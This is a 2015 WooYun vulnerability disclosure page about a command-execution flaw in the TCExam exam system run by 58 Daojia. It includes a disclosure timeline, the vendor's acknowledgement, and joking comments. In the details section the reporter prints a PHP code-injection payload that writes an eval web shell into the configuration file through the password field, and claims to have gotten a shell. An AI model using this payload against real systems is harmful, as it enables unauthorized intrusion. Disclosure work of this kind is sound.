当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131524

漏洞标题:58到家之看我轻松帮司马加薪

相关厂商:58同城

漏洞作者: luwikes

提交时间:2015-08-04 13:47

修复时间:2015-09-18 14:12

公开时间:2015-09-18 14:12

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-04: 细节已通知厂商并且等待厂商处理中
2015-08-04: 厂商已经确认,细节仅向厂商公开
2015-08-14: 细节向核心白帽子及相关领域专家公开
2015-08-24: 细节向普通白帽子公开
2015-09-03: 细节向实习白帽子公开
2015-09-18: 细节向公众公开

简要描述:

已shell,^-^

详细说明:

58到家内部考试网http://exam.daojia.com使用的是tcexam系统。
看一下tcexam存在通杀设计缺陷 WooYun: tcexam存在通杀设计缺陷(可以getshell)

QQ20150804-8@2x.jpg


直接填一个');?><?php eval($_POST['w']);//
访问看一下

QQ20150804-13@2x.jpg


放心,填的是密码处,所以没有连到数据库,也没有改动内部任何东西,把配置文件改回来就好了(再说是内部考试系统,司马别打我)

QQ20150804-10@2x.jpg


QQ20150804-11@2x.jpg

漏洞证明:

QQ20150804-10@2x.jpg


QQ20150804-11@2x.jpg


防护很不错,已被墙,挂了代理才继续看到。。

修复方案:

子公司要协助司马的安全建设啊

版权声明:转载请注明来源 luwikes@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-04 14:10

厂商回复:

感谢小伙伴的付出,学习了!终于可以教育开发了,虽然最近感觉压力略大,但是一想到能去教育开发,好开心!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-04 13:47 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:17 | 当我又回首一切,这个世界会好吗?)

    @RedFree 来看看这个exp啊

  2. 2015-08-04 13:49 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:81 )

    啥子命令执行噢

  3. 2015-08-04 13:54 | JiuShao ( 普通白帽子 | Rank:405 漏洞数:78 | ╮(╯▽╰)╭锄禾日当午)

    这个exp叼啊

  4. 2015-08-04 14:01 | RedFree ( 普通白帽子 | Rank:180 漏洞数:40 | 每个系统都有它自身的弱点,无论是相对的还...)

    @xsser 帮司马加薪,司马赶快过来写插件,哈哈……

  5. 2015-08-04 14:01 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:208 | 一个致力要将乌云变成搞笑论坛的男人)

    我擦嘞,这可得关注下

  6. 2015-08-04 14:03 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:78 | ★ 梦想这条路踏上了,跪着也要...)

    司马要加薪了。。

  7. 2015-08-04 14:07 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:75 | [code]心若没有栖息的地方,走到哪里都是在...)

    @xsser @玉林嘎 @JiuShao @RedFree @小川 @泳少 司马是谁啊?

  8. 2015-08-04 14:11 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:55 | 收wb 1:5 无限量收 [平台担保]))

    这个exp叼啊

  9. 2015-08-04 14:38 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:533 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    一想到能去教育开发,好开心!

  10. 2015-08-04 15:14 | 小杨 ( 路人 | Rank:22 漏洞数:4 | 。)

    运维教育开发?哈哈

  11. 2015-09-18 14:35 | Constantine ( 路人 | Rank:1 漏洞数:1 | 不交450谁也保不了你)

    开发又被挂在树了吊打

  12. 2015-09-18 15:20 | 盛大网络(乌云厂商)

    这跟开发有什么关系呢

  13. 2015-09-18 17:21 | 無名老人 ( 路人 | Rank:15 漏洞数:2 | 干过开发,日过渗透,江湖人称: 少女杀手)

    @盛大网络 研发太屌,不听话呗